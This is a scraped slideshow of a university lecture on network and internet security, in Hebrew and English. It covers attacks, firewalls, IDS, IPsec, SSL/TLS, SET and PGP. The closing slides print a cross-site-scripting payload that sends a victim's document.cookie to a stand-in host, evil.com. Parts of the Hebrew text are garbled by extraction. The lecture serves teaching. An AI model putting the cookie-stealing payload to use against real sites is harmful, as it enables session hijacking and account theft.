Upload
sopoline-mendoza
View
35
Download
2
Tags:
Embed Size (px)
DESCRIPTION
Chapter 8. אבטחת מידע ברשת האינטרנט. Stallings Chp. 6,8,9,21 22. מודל רשת ה- Internet. בשל המורכבות העבודה מתחלקת בין שכבות. כל שכבה מתקשרת פיזית עם השכבות הסמוכות לה, ולוגית עם השכבה המקבילה לה. מודל רשת ה- Internet. עיבוד חבילה בשליחה. מודל רשת ה- Internet. עיבוד חבילה בקבלה. - PowerPoint PPT Presentation
Citation preview
I.B - Network security 1
Chapter 8
אבטחת מידע ברשת האינטרנט
Stallings Chp. 6,8,9,21 22
I.B - Network security 2
Internetמודל רשת ה-
Application
TCP (תובלה)
IP (רשת)
MAC (פיזית)
בשל המורכבות העבודה מתחלקת בין שכבות.
כל שכבה מתקשרת פיזית עם השכבות הסמוכות לה, ולוגית עם השכבה המקבילה לה.
I.B - Network security 3
Internetמודל רשת ה-
בשליחה חבילה עיבוד
I.B - Network security 4
Internetמודל רשת ה-
עיבוד חבילה בקבלה
I.B - Network security 5
Internetמודל רשת ה-
שכבה כל ותפקיד החבילה מבנה
MAC header . כתובת – את מכיל הפיזית המדיה לפי משתנה.MACה- נוספת ואינפורמציהIP header : כתובות – היתר בין , IPמכיל , והמקבל השולח של
TTL( ,הבא (, TCP/UDPהפרוטוקול פרוטוקול וגרסת אחר אוIP.UDP/TCP header : השולח של הפורטים מספרי מכיל
חיוויים )TCPוהמקבל. בנוסף ומספרים( syn/ackמכילסידוריים.
I.B - Network security 6
Internetמודל רשת ה-
הרשת עולם
I.B - Network security 7
תקשורת רשתות על איומים
מידע – למצוא ניתן המשתמשים על להקל נועדו מחשבים רשתות.' וכו, למקום ממקום אותו להעביר קל בקלות
, אותו להעביר שקל המידע את למצוא שקל היא הנלווית הבעיה. לתוקפים' – גם וכו
:trade-offקיים המידע בטיחות לבין ברשת השימוש נוחות בין , לפרוץ ניתן דרכן תורפה נקודות יוצרת לרשת התחברות
למערכת.. רבות תורפה נקודות לאבטח דורש ומשאבים נתונים ביזור.) מוגנים ) לא ורובם רבים שירותים יש בשכבות תלוי בלתי באופן להתקפות חשופה ברשת שכבה כל
האחרות
I.B - Network security 8
Internetהתקפות ב-
SniffingDNS PoisoningIP Spoofing- ה: כתובת -IPשינוי ה hostשל
-- ה כתובת על רק מתבסס הזיהוי IPלעיתים
מוסגרת - לא התוקף כתובת
- " התקפות " לבזר מאפשר ) " למתחזה) תישלח לא התשובה כ בדר
I.B - Network security 9
Internetהתקפות ב-
Port scan השרת על רצות אפליקציות זיהויSocial engineering -בריגול שימושי מאוד
תעשייתי מידע ואגירת שטח סיור...ועוד
I.B - Network security 10
Cross Site Scripting (CSS/XSS)
בהרבה מלאה שונות )scriptsהרשת ...(JavaScript/VBScriptבשפות - לתוך לביצוע קוד שורות להכניס כדי תקינות בדיקת חוסר לנצל הרעיון
מסמכים. – אחרי כי נניח -loginלדוגמא ה לשרת , webmailמוצלח אתם שלכם
לכתובת www.webmail.example.com/inbox?sid=valueמועברים. אימות לאחר שלכם הכניסה של מזהה הוא השווה סימן אחרי הערך כאשר
( לדוגמא לתוקף הכתובת את יעביר אשר קוד דואר הודעת בתוך לשתול ניתן " י" ע בהודעה בכוונה נשתלה שכתובתו קיים שלא למשאב לגשת נסיון י ע
- ה( את לדעת התוקף יכול וכך -URLהתוקף ה את גם .sidולכן
קבצי של לשליחה לגרום יכולה תקינות בדיקת מאי שנובעת אחרת בעייהדף של למשתמש )aspהקוד ולהורות hackerמהשרת זאת לנצל יכול
' , , שמות נמצאים שם למע הכניסה דף של קוד קבצי למשל לו לשלוח לשרת- " . ב פרמטר הוספת י ע זאת כל שלהם הכניסה וקוד אותו URLמשתמשים של
asp.)
I.B - Network security 11
על TCPהתקפות
מעל שרצים רבות TCPשרתים להתקפות חשופיםשרתים) עבור גם קיימות התקפות מאותן חלק
מעל (.UDPשרצים – מתחיל כאשר מערכת, TCP sessionהסיבה
. משאבים מקצה ההפעלה- ש עד מוקצים נשארים המשאבים מחליט TCPכל
של ) sessionשה- במקרה דקות שתי TCPסגורתקני(.
של להפיל TCP sessionsפתיחה יכולה מדי רבים. המחשב את
Classic Denial of Service Attacks (Chp 8)
can use simple flooding pingfrom higher capacity link to lowercausing loss of trafficsource of flood traffic easily
identified
Source Address Spoofing
use forged source addressesgiven sufficient privilege to “raw sockets”easy to create
generate large volumes of packetsdirected at targetwith different, random, source
addressescause same congestionresponses are scattered across Internetreal source is much harder to identify
SYN Spoofing
other common attackattacks ability of a server to respond
to future connection requests overflowing tables used to manage
themhence an attack on system resource
TCP Connection Handshake
SYN Spoofing Attack
SYN Spoofing Attack
attacker often uses eitherrandom source addressesor that of an overloaded serverto block return of (most) reset packets
has much lower traffic volumeattacker can be on a much lower
capacity link
I.B - Network security 18
הגנות ברשת
: - סוגים תתי לשני האבטחה בעיות את לסווג ניתן לעולם המחשב מחשיפת הנובעות בעיות) השכבות ) מודל הרשת מארכיטקטורת הנובעות בעיות
: הגנה, סוגי שני על לדבר ניתן לפיכךFirewalls -לעולם החשיפה לצמצום - בנפרד שכבה כל על להגנה אבטחה פרוטוקולי
I.B - Network security 19
הגנות ברשת
Firewalls / משאבים נתונים על הגנה מספקים. " המוגנת" הרשת בתוך נייחים
: נתונים על להגן אבטחה פרוטוקולי של המטרה , , אימות ) שלמות סודיות לספק ברשת מעבר בזמן
.) ועוד השולח , : : למשל נוספות התקפות מניעת נוספת מטרה
- ו הקשר .syn attackחטיפת מערכות IDS – Intrusion Detection
Systems
Intrusion Detection Systems (Chp. 6)
classify intrusion detection systems (IDSs) as:Host-based IDS: monitor single host activityNetwork-based IDS: monitor network traffic
logical components:sensors - collect dataanalyzers - determine if intrusion has occurreduser interface - manage / direct / view IDS
IDS Principles
assume intruder behavior differs from legitimate usersexpect overlap as shownobserve deviations
from past historyproblems of:
false positivesfalse negativesmust compromise
IDS Requirements
run continuallybe fault tolerantresist subversionimpose a minimal overhead on systemconfigured according to system security
policies adapt to changes in systems and usersscale to monitor large numbers of systemsprovide graceful degradation of serviceallow dynamic reconfiguration
Host-Based IDS
specialized software to monitor system activity to detect suspicious behaviorprimary purpose is to detect intrusions, log suspicious
events, and send alertscan detect both external and internal intrusions
two approaches, often used in combination:anomaly detection - defines normal/expected behavior
threshold detection profile based
signature detection - defines proper behavior
Audit Records
a fundamental tool for intrusion detection
two variants:native audit records - provided by O/S
always available but may not be optimum
detection-specific audit records - IDS specificadditional overhead but specific to IDS taskoften log individual elementary actionse.g. may contain fields for: subject, action, object,
exception-condition, resource-usage, time-stamp
Anomaly Detectionthreshold detection
checks excessive event occurrences over timealone a crude and ineffective intruder detectormust determine both thresholds and time intervals
profile basedcharacterize past behavior of users / groupsthen detect significant deviationsbased on analysis of audit records
gather metrics: counter, guage, interval timer, resource utilization
analyze: mean and standard deviation, multivariate, markov process, time series, operational model
Network-Based IDS
network-based IDS (NIDS)monitor traffic at selected points on a networkin (near) real time to detect intrusion patternsmay examine network, transport and/or
application level protocol activity directed toward systems
comprises a number of sensorsinline (possibly as part of other net device)passive (monitors copy of traffic)
I.B - Network security 27
הגנות ברשת
Firewalls / משאבים נתונים על הגנה מספקים. " המוגנת" הרשת בתוך נייחים
: נתונים על להגן אבטחה פרוטוקולי של המטרה , , אימות ) שלמות סודיות לספק ברשת מעבר בזמן
.) ועוד השולח , : : למשל נוספות התקפות מניעת נוספת מטרה
- ו הקשר .syn attackחטיפת מערכות IDS – Intrusion Detection
Systems
I.B - Network security 28
Firewall
Firewall אזורים שני בין שמפרידה מערכת היא. ביניהם התקשורת על אבטחה מדיניות וכופה ברשת
: להיות יכולים האזורים/ ציבורית פרטית רשת ( של הרשת שונים סיווגים בעלות ארגון של רשתות תתי
) האחרות המחלקות וכל כספים מחלקתFirewall בין העוברת התעבורה של סינון מבצע
. שונים אזוריםFirewall , בודד נתב או ממחשב מורכב להיות יכול
.' , וכו נתבים מחשבים מאוסף או
I.B - Network security 29
Firewall
Choke point – דרך התעבורה כל ניתוב . החיצוני העולם אל המידע זרימת כל צר נתיב
- ה דרך עוברת FirewallוממנוFail safe , אך – פריצה גוררת איננה נפילה
! מנותקת התעבורה זה במקרה פשוט מבנה הקצה למשתמש שקיפות
I.B - Network security 30
Firewall
I.B - Network security 31
Firewall
: סוגים לשלשה לחלק ניתן(stateless ) Packet Filter -החבילות את מסנן
סטאטיים כללים לפיStateful PF -דינאמיים בכללים משתמש
ההתקשרות מצב אחרי העוקביםProxy servers -בין אקטיבית התערבות
המרוחק לשרת המשתמש
I.B - Network security 32
Stateless PFדוגמה -
- שלנו שברשת לכל, N1נניח לאפשר מעוניינים אנולבצע לרשת telnetהמחשבים מחוץ מחשב לכל
- אחד למחשב .C1פרט חיבור לאפשר נרצה כן -HTTPכמו ה Webבין
Server, S1. באינטרנט, המחשבים לכל ,מחוץ מחשבים של התחזות למנוע נרצה בנוסף
. פנימי למחשב לרשת. אסורה אחרת תקשורת כל
I.B - Network security 33
Stateless PFדוגמה -Rule In/
Out
Src adr.
Dst adr.
Next prot.
Src port
Dst port
TCP flag
Action
spoof in N1 any any any any any deny
no_telnet1
out C1 any TCP >1023
23 any deny
no_telnet2
in any C1 TCP 23 >1023
any deny
telnet1 out N1 any TCP >1023
23 any permit
telnet2 in any N1 TCP 23 >1023
ack permit
HTTP1 in any S1 TCP >1023
80 any permit
HTTP2 out S1 any TCP 80 >1023
ack permit
default any
any any any any any any deny
telnet 23- פורטhttp 80- פורט
1023<פורט כללי-
I.B - Network security 34
Active/Passive FTP
של לפורט FTPבמצב פונה הלקוח לאתחול 21אקטיבי השרת שלאת, לקבל מעוניין הוא בו פורט מספר לו מעביר זמן ובאותו הקשר
.Dataה- מפורט פונה השרת השני המשתמש 20בשלב של לפורט קשר ויוזם: כך תראה הטבלה
Rule In/Out
Src adr.
Dst adr.
Next prot.
Src port
Dst port
TCP flag Action
ftp_21_1 out N1 any TCP >1023 21 any permit
ftp_21_2 in any N1 TCP 21 >1023 ack permit
ftp_20_1 in any N1 TCP 20 >1023 any permit
ftp_20_2 out N1 any TCP >1023 20 ack permit
שלו 20נשים לב כי החוק השלישי מאפשר לתוקף ליזום קשר מפורט . 1023<למחשב פנימי שפתח פורט
I.B - Network security 35
Active/Passive FTP
של לפורט FTPבמצב פונה הלקוח , 21פאסיבי הקשר לאתחול השרת של- ה יועבר בו פורט מספר לו מעביר השרת הפעם .Dataאך
. מהשרת שקיבל לפורט קשר ויוזם כלשהו מפורט פונה הלקוח הבא בשלב: כך תראה הטבלה זה במקרה
Rule In/Out
Src adr.
Dst adr.
Next prot.
Src port
Dst port
TCP flag Action
ftp_21_1 out N1 any TCP >1023 21 any permit
ftp_21_2 in any N1 TCP 21 >1023 ack permit
ftp_data_1 out N1 any TCP >1023 >1023 any permit
ftp_data_2 in any N1 TCP >1023 >1023 ack permit
הפעם אין אפשרות ליזום קשר אל מחשב פנימי בעזרת החוקים הללו. נשים לב כי השרת צריך לנקוט בצעדי מניעה מתאימים שהרי הפעם
ניתן ליזום קשר לפורטים גבוהים בשרת.
I.B - Network security 36
Stateful PF
- ב המחשבים לכל המאפשר סטטי חוק בטבלה :telnetלבצע N1נשיםtelnet: out, N1, any, TCP, >1023, 23, syn, permit
שמשתמש נניח -Cכעת -N1מ ה לשרת להתחבר מחשב telnetמעוניין RCשל . כך לצורך באינטרנט נמצא מפורט Cאשר חבילה לפורט 1049שולח של 23שלו
RC- , ה. זה קשר המאפשר סטטי חוק קיים שבטבלה לטבלת Firewallכיוון יוסיף: הבאות הדינאמיות השורות את החוקים
telnet1: out, C, RC, TCP, 1049, 23, ack, permittelnet2: in, RC, C, TCP, 23, 1049, ack, permit
בין הקשר סגירת לאחר ממנה יוסרו לטבלה שנוספו הדינאמיות -Cהשורות RCל - חבילות TCPב) מתוך לזהותה ניתן ולכן מסודרת בצורה נעשית קשר סגירתלאחר( TCPה- לחלופין .timeoutאו
קשר לאפשר ניתן דומה -FTPבאופן , ל לאפשר יש אולם גישה Firewallאקטיבי- ' ה ) יועבר בו הפורט מס את לדעת בכדי האפליקציה ברמת כך dataלמידע
.) אליו הקשר שיתאפשר
I.B - Network security 37
Proxy server
Proxy server - שהתקבל שקובץ לבדוק למשל מקודמיו יותר מסובכות פעולות לבצע יכול.ftpמשרת וירוסים מכיל לא
- ה אצל עוברות החבילות -Proxy Serverכאשר המידע Proxy Serverה, על בדיקות מבצע . כך לשם החבילה עם לעשות מה מחליט בדיקות אותן סמך ועל המחשבים שני בין המועבר
- ה מען )Proxy Serverעל הוא עליו הפרוטוקול את , telnetלהכיר .) כללי באופן לכן למשליחידה )Proxy Serverכל אפליקציה על (.httpאו telnetיגן למשל,
- ש לפעולות :Proxy Serverדוגמאות לבצע יכול. לעשות מה להחליט כדי מידע מספיק שמכילות חבילות אליו שיגיעו לחכות. , אותו לשנות או לזרוק המידע את להעביר. שלו הדפדפן ידי על המבוקשים בדפים תמונות יראה לא שהמשתמש לכך לגרום- מה מידע יקבלו מסויימים משתמשים שרק של Proxy Serverלדאוג אימות לבצע או
.) " השירות ) מתן לפני מהמשתמש סיסמה דרישת י ע למשל המשתמש. - לארגון שנכנסים קבצים על וירוס אנטי תוכנת להכניס- שב יועברו FTPלדאוג לא אולם הפנימית הרשת לתוך מהאינטרנט רק יועברו קבצים
. החוצה הפנימית מהרשת
I.B - Network security 38
התצורה המקובלת
I.B - Network security 39
Firewallsהמצב כיום -
של ההתקפות חסימת ירדה firewallsיעילותהאחרונות בשנים משמעותית
עוקפת מחשבים: firewallתעבורה לדוגמאניידים
פתוחים שלרוב פורטים על התקפותפורט: firewallsב- 80לדוגמא- ב שהשימוש אומר זה , firewallאין מיותר
. " , כ בדר מספיק אינו שהוא אלא
I.B - Network security 40
אבטחה פרוטוקולי
להוסיף שכבה באיזו? אבטחה שירותי
שפרוטוקול: נאמר הגדרהברמה עובד xאבטחה
המידע על מגן הוא אםשמעל השכבות . xשל
הגנה, הוספת לדוגמא: הרשת ברמת
Application
TCP (תובלה)
IPsec
IP (רשת)
MAC (פיזית)
I.B - Network security 41
האפליקציה ברמת אבטחה פרוטוקול
, - , , נגד הגנה הכחשה אי שלמות סודיות לספק ניתן.) האפליקציה ) ברמת השולח ואימות חוזר שידור
. בניתוב פוגע איננו מסופקend to end. של בדיקות משבש .firewallsאיננו כדוגמת התקפות כנגד מגן .Syn attackאיננו. / האפליקציה עדכון שינוי מחייב :דוגמהPGP.
I.B - Network security 42
התובלה ברמת אבטחה פרוטוקול
, , חוזר שידור נגד הגנה שלמות סודיות לספק ניתן. השולח ואימות
. בניתוב פוגע אינו לספק .end to endניתן של בדיקות משבש .firewallsאיננו כדוגמת התובלה שכבות על התקפות כנגד מגן איננו
Syn attack.. לאפליקציה שקוף :דוגמהSSL/TLS
I.B - Network security 43
הרשת ברמת אבטחה פרוטוקול
, , חוזר שידור נגד הגנה שלמות סודיות לספק ניתן- ה ) ברמת השולח (.IPואימות
. בניתוב פוגע איננו לספק .gateway to gatewayאו end to endניתן של בדיקות .firewallsמשבש- ל .transportשקוף ולאפליקציה ( כגון התובלה שכבות על התקפות נגד להגן synניתן
attack.) :דוגמאIPsec.
I.B - Network security 44
הפיזית ברמה אבטחה פרוטוקול
( , ברמת השולח ואימות שלמות סודיות לספק ניתן(.MACה-. פיזית מדיה תלויhop by hop – בניתוב נקודות שתי כל בין כלומר
. ההגנה שכבות את להחליף צריך- מה ביותר הגדול החלק על .datagramמגן- ל מורידה ) IPשקוף שמטפלת תחנה כל כי ומעלה
- ה ברמת ההגנה שכבות (MACאת :דוגמאWEP.
I.B - Network security 45
IPSecאבטחה ברמת הרשת -
IPSec הבאים הפרוטוקולים את מכיל תעבורת לאבטחת פרוטוקולים :IPשני
ESP / אימות – או ו הצפנה מספקAH – בלבד אימות מספק
מפתחות והחלפת לניהול .IKEפרוטוקול- ב להשתמש :IPSecניתן אופנים בשני
-Transport Mode -קצה מחשבי בין -Tunnel Mode ( -למשל למשתמש שקוף באופן
(VPNליצירת
I.B - Network security 46
Tunnel mode
A B
Encrypted Tunnel
Gateway Gateway
New IP Header
AH or ESP Header
TCP DataOrig IP Header
Encrypted
Unencrypted Unencrypted
I.B - Network security 47
IPSec
ערוץIPSec. הדדי אמון ביניהן שיש מכונות בין רק מוקם. - טווח ארוכי מפתחות החלפת באמצעות ליצור ניתן האמון את ( שימוש יש פומביים מפתחות להיות יכולים אלה מפתחות
" PKIב- י ע מעין( ) X.509שמוגדר סימטריים מפתחות או .) " משותפת" סיסמא
- ל החשיפה צמצום מאפשר המכונות בין ההדדי synהאמוןattack וכנגדDoS.
, מכונה אם זאת , Bומכונה Aעם ותוקף הדדי אמון בעלותמכונה על תקיפת, Aמשתלט לצורך בה להשתמש יוכל הוא
B.
I.B - Network security 48
IPSec
בו שמותקן מחשב מבנה, IPSecכל מחזיקשנקרא Security Associationנתונים
Database ,בקיצור .SADאו שנקראות רשומות מחזיק זה נתונים מבנה
Security Association ( ובקיצורSA.)
I.B - Network security 49
IPSec
SAD- מ מורכב שנקראות SA (Securityרשומות
Association) שנקראים הרשומות של SPIאינדקסים
(Security Parameter Index) של שהתוכן , SAמכיוון מכונות לשתי משותף
שני SAלכל במכונה, SPIיש והשני AאחדBבמכונה
I.B - Network security 50
IPSecדוגמה -
I.B - Network security 51
IPSecדוגמה -
SA : לבוב מאליס אליס אצלProtocol = ESP, transport mode,
Enc. Key = DES3, Intg. Key = HMAC-MD5Life time = 10 Min
SPI = 17 Alice’s encryption key = 0x0c0c0c
Alice’s integrity key = 0x0d0d0dSequence number: 20
Alice BobSPI = 17
I.B - Network security 52
IPSec
IPSec: הבאים האבטחה שירותי את מספק- ב – בהצפנה ESPסודיות שימוש תוך- ה – באמצעות MACשלמות- ה – באמצעות השולח MACאימות- ה – באמצעות חוזר שידור כנגד sequence numberהגנה- ה – ידיעת דרישת באמצעות גישה תקשורת SAבקרת לצורך המתאים- ל החשיפה לבצע, syn attackמזעור יכול אינו שתוקף IPמכיוון
spoofing- ה ) ידיעת (.SAודרישת המתאים נגד / session hijackingהגנה " אימות – או ו הצפנה י ע כנגד -IP spoofingמניעת – DoSהגנה ה ) ידיעת (.SAודרישת המתאים
I.B - Network security 53
IPSecהצפנה ואימות -
:IPSecל- פרוטוקולים תתי שניESP – Encapsulating Security
Payload , , שלמות אימות סודיות מספקחוזר שידור כנגד והגנה
AH – Authentication Header , ושלמות אימות חוזר שידור כנגד הגנה מספק
- ה) של (IP headerגם
I.B - Network security 54
ESP
I.B - Network security 55
AH
I.B - Network security 56
SSL/TLS
עם תחילת השימוש במסחר האלקטרוני היה חשש לגבי בטיחות המידעהנשלח ברשת.
.על מפתחי האפליקציה נגזר להוסיף אמצעי בטיחות בתוך האפליקציה פיתחה 1994בשנת Netscape Communications -את פרוטוקול ה SSL
(Secure Socket Layer). פרוטוקול הממומש כמעין שכבה נוספת בפרוטוקול השכבות, בין שכבות
האפליקציה והתובלה.:הפרוטוקול מספק לשכבת האפליקציה שמעליו
.)אימות זהות )השרת ו/או הלקוח.שלמות.אימות ההודעות.סודיות להודעות
.פרוטוקול זה נחשב כיום כסטנדרט במסחר אלקטרוני הגרסה הסטנדרטית נקראת גםTLS (Transport Layer Sec.).
I.B - Network security 57
SSL/TLS
( למשל מסוימת אפליקציה האם בהבחנה צורך (, httpיש " י ע . SSLמוגנת גם מוקצה לכל כך לצורך שלא portאו
עם עובדת כאשר תשתמש בו .SSLנוסף :לדוגמאhttp מעלSSL (https) בפורט בעוד, 443עובד
בפורט httpש- עובד .80רגיל
Application
SSL RecordSSL Record
TCP
IP
MAC
I.B - Network security 58
SSL/TLS
- ו האפליקציה לשכבות אבטחה נותן .SSLהפרוטוקוליתרונות: התובלה ברמת לאבטחה
. ' אבטחה ' עם מהתעסקות פטור האפליקציה כותב. האפליקציות סוגי לכל מתאימה האבטחה מעל עובד שהפרוטוקול המהימנות, TCPמכיוון את אוטומטית מקבל הוא
- ב TCP( Ack.)הקיימת , חבילות סידור חבילה לכל עם עבודה - Packet Filtering Firewallsמאפשר שה, מפני headersזאת
.TCP/IPשל מוצפנים אינם
חסרונות: התובלה ברמת לאבטחה - ב הנמצא .TCP/IPשל headersהמידע ברשת חשוף נשלח - ה על אימות מבוצע שלא מספק TCP/IPשל headersמכיוון לא הפרוטוקול
: ההתקפות בפני הגנהSyn Attack - ה – שכבת על .TCPהתקפהIP Spoofing - ה – שכבת על .IPהתקפה
Secure Sockets Layer (SSL)
transport layer security serviceoriginally developed by Netscapeversion 3 designed with public input
subsequently became Internet standard RFC2246: Transport Layer Security (TLS)
use TCP to provide a reliable end-to-end service
may be provided in underlying protocol suite
or embedded in specific packages
SSL Protocol Stack
SSL Record Protocol Services
message integrityusing a MAC with shared secret keysimilar to HMAC but with different padding
confidentialityusing symmetric encryption with a shared
secret key defined by Handshake ProtocolAES, IDEA, RC2-40, DES-40, DES, 3DES,
Fortezza, RC4-40, RC4-128message is compressed before encryption
SSL Record Protocol Operation
SSL Change Cipher Spec Protocol
one of 3 SSL specific protocols which use the SSL Record protocol
a single messagecauses pending state to become
currenthence updating the cipher suite in
use
SSL Alert Protocolconveys SSL-related alerts to peer entityseverity
warning or fatal
specific alertfatal: unexpected message, bad record mac,
decompression failure, handshake failure, illegal parameter
warning: close notify, no certificate, bad certificate, unsupported certificate, certificate revoked, certificate expired, certificate unknown
compressed & encrypted like all SSL data
SSL Handshake Protocol allows server & client to:
authenticate each other to negotiate encryption & MAC algorithms to negotiate cryptographic keys to be used
comprises a series of messages in phases
1. Establish Security Capabilities2. Server Authentication and Key Exchange3. Client Authentication and Key Exchange4. Finish
SSL Handshake Protocol
I.B - Network security 67
אבטחה ברמת האפליקציה
הצפנה על בעיקר נשענת זו ברמה האבטחה , הבניין באבני שימוש תוך דיגיטליות וחתימות
כה עד שלמדנו תשתית דורש הצפנה במפתחות שימוש
בטוחה בצורה מפתחות לחלוקת " י" ע הניתנים בסרטיפיקטים שימוש תוך כ בדר
CA המשתמשים כלל סומכים עליו - מקובל X.509סטנדרט
I.B - Network security 68
אבטחה ברמת האפליקציה
I.B - Network security 69
אבטחה ברמת האפליקציה
X.509: סרטיפיקט לקבלת דרכים שתי מגדירCentral- ה: זו הפרטי CAבשיטה המפתח את מייצר
הלקוח ) עבור אולם(, subjectוהציבורי ושולח . ) מתאימה) זו שיטה הלקוח אל מוגנת בצורה
של אמצעי certificatesלחלוקה על שמאוכסניםלדוגמא ) ממוגן (.smart cardפיסי
Distributed :המפתח את מייצר הלקוח זו בשיטה- ה אל בקשה ושולח והציבורי לו CAהפרטי שמחזיר
certificate . כי לציין חשוב הציבורי המפתח עבור- ה על זו המפתח CAבשיטה את יודע הלקוח כי לוודא
. המתאים הפרטי
70
Secure Electronic Transactions• Cryptographic protocol
• Developed by Visa, Mastercard, Netscape, and Microsoft
• Used for credit card transactions on the Web
• Provides– Authentication of all parties in transaction
– Confidentiality: transaction is encrypted to foil eavesdroppers
– Message integrity: not possible to alter account number or transaction amount
– Linkage: attachments can only be read by 3rd party if necessary
71
Secure Electronic Transactions• SET protocol supports all features of credit
card system– Cardholder registration
– Merchant registration
– Purchase requests
– Payment authorizations
– Funds transfer (payment capture)
– Chargebacks (refuns)
– Credits
– Credit reversals
– Debit card transactions
• SET can manage– real-time & batch transactions
– installment payments
72
BankBank
Customer Merchant
Customer’s bank“Issuer”
Merchant’s bank
1. Customer browses and decides to purchase
2. SET sends order and payment information
7. Merchant completes order
3. Merchant forwards payment information to bank
6. Bank authorizes payment
8. Merchant captures transaction
4. Bank checks with issuer for payment authorization
5. Issuer authorizes payment
9. Issuer sends credit card bill to customer
Secure Electronic Transaction
I.B - Network security 73
PGP
PGP( " צימרמן פיליפ י ע שהומצאה תוכנה PhillipהיאZimmerman ,)ודואר קבצים להצפנת משמשת התוכנה
' וחתימה. להצפנה באלג שימוש עושה היא אלקטרוניידועים ) '(.RSA, DESדיגיטלית וכו,
" היתה ב ארה מתחומי קריפטוגרפי קוד הוצאת פיתוחה בעת , , לפינלנד, כספר נשלחה בספר הודפסה התוכנה ולכן אסורה
לקוד חזרה נסרקה .Cשם , לבדיקה פתוח הקוד והיות לממסד מחוץ התוכנה צמיחת עקב
ואימות, להצפנה המשמש ככלי מהר אומצה התוכנה והערכה. אלקטרוני ודואר קבצים של
I.B - Network security 74
PGPמודל האמון -( web/ring of trust)
- ש ויותר PGPמכיוון ממסדית ברוח פחות היא: שונות, הן שלה האמון הנחות חופשית
PGP שכל רשות של קיום מניח אינועליה ) סומכים (.CAהמשתמשים
- כ משמש משתמש על CAכל לחתום ויכול. כרצונו אחרים משתמשים של סרטיפיקטים
על מפורשת בצורה לבד מחליט משתמש כל. לא מי ועל סומך הוא מי
I.B - Network security 75
PGP
בעזרת המשתמשים בין נשלחים הפומביים המפתחותסרטיפיקטים.
. פומבי ומפתח אלקטרוני דואר כתובת מכיל סרטיפיקט : . " אליס למשל שונים משתמשים י ע חתומים הסרטיפיקטים
. שלה הסרטיפיקט על לחתום שלה מהחברים לבקש יכולה
. אליס: של הסרטיפיקט על שונות חתימות יאסוף בוב הרעיוןאו לסרטיפיקט מאמין הוא אם יחליט הוא החתימות סמך על
לא.
I.B - Network security 76
PGP
מחליט של Bobכיצד לסרטיפיקט להאמין אםAlice? לא או
,אינטואיטיביתBob אשר לחתימות רק להאמין צריך " שהוא משתמשים של אמיתיים מפתחות י ע נעשו
. עליהם סומךBob במחזיק אחרים ממשתמשים חתימות שומר
מספיק( keyringמפתחות ) לו יש האם ובודקשל למפתח מהימנות .Aliceחתימות
I.B - Network security 77
PGPדוגמה למחזיק מפתחות -
04/19/23 INFS 754: Fall 2006 slide 78
Web Authentication
Cookies
04/19/23 INFS 754: Fall 2006 slide 79
Cookie-based Web Authentication
Need an authentication system over HTTP that does not require servers to store the session dataWell, why not?Because, servers can be subject to overwhelming of
data (DOS attacks) Remember the SYN flooding attack?
Storing unknown data is a potential riskServers such as hotmail can have huge number of
connectionsBecomes unmanageable to store session data for all
the connections at all times Where are cookies stored on the computer and browser? How to view them? Restrain? Delete?
04/19/23 INFS 754: Fall 2006 slide 80
Cookies on clients instead
Servers use cookies to store state on clientWhen session starts, browser computes an
authenticator, calls it a “cookie” and sends it to the client-browser
The authenticator (or cookie) is some value that client can not forge on her own
E.g. Hash( Server’s private key, session-id ) With each request, browser presents the cookie to the
serverServer recomputes the value and compares
it to the cookie received
04/19/23 INFS 754: Fall 2006 slide 81
Example session using cookies
client server
POST /login.cgi
Set-Cookie:authenticator
GET /restricted.htmlCookie:authenticator
Restricted content
Verify that thisclient is authorized
Check validity ofauthenticator)e.g., recomputehash)key,sessId((
Authenticator is both unforgeable and tamper-proof
04/19/23 INFS 754: Fall 2006 slide 82
Cookie stealing using cross scripting (XSS attacks)
victim’s browser naive.comevil.com
Access some web page
>FRAME SRC=http://naive.com/hello.cgi?name=>script>win.open)“http://evil.com/steal.cgi?cookie=”+document.cookie(>/script>>
Forces victim’s browser tocall hello.cgi on naive.comwith script instead of name
GET/ hello.cgi?name=>script>win.open)“http://evil.com/steal.cgi?cookie”+document.cookie(>/script> hello.cgi
executed
>HTML>Hello, dear>script>win.open)“http://evil.com/steal.cgi?cookie=”+document.cookie(>/script>Welcome!>/HTML>
Interpreted as Javascript by victim’s browser; opens wndow and calls steal.cgi on evil.com
GET/ steal.cgi?cookie=